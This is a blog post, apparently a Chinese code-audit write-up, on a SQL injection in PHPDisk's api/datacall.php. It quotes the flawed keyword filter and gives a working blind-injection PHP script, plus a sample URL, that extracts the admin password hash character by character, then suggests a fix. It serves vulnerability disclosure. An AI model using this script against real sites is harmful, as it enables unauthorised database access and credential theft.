您的位置 » 首页 » 代码审计 » 代码审计:躺在床上读代码之 phpdick SQL注射

代码审计:躺在床上读代码之 phpdick SQL注射

发表于4年前 | 作者: seay | 分类: 代码审计 | 孵化于:2012年12月05日 | 文章热度:2,740 次 全屏阅读

显示不全请点击全屏阅读

详细说明:

在phpdisk/api/datacall.php
中有一段代码:

$order = trim(gpc('order','G','')); $by = trim(gpc('by','G','')); $limit = (int)gpc('limit','G',0); if(!$type || !$order || !$by || !$limit){ echo 'PHPDisk Datacall Parameter is null or Error!'; exit; } $filter_arr = array('select','delete','update','insert'); for($i=0;$i<count($filter_arr);$i++){ if(strpos($order,strtolower($filter_arr[$i]))!==false){ die('PHPDisk Datacall Parameter Error!'); } } if($type=='user'){ echo '<ul>'.LF; $q = $db->query("select username,userid from {$tpf}users order by $order $by limit $limit");

$order和$by进入了query查询,看的出来作者想到了可能会有人在order里提交query,但是他没想到在不提交order,在by里提交一样可以注射。

漏洞证明:

 

<?php $file = 'http://localhost/phpdisk/api/datacall.php'; for($i=0;$i<32;$i++) { $path = $i+1; foreach(array('a','b','c','d','e','f',0,1,2,3,4,5,6,7,8,9) as $w) { $api = $file.'?type=user&by='.urlencode('(if(((select substring(password,'.$path.',1) from pd_users where userid=1)=0x'.bin2hex($w).'),userid,username))').'&order=/**/&limit=1'; if(strpos(file_get_contents($api),'admin')!==false) { echo $w; break; } } } //http://localhost/phpdisk/api/datacall.php?type=user&by=if%28%28%28select%201%20from%20pd_users%20where%20userid=1%20limit%201%29=2%29,userid,username%29&order=/**/&limit=1 ?>

 

修复方案:

只允许a-z的order和by

Tags:

phpdick漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1828/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)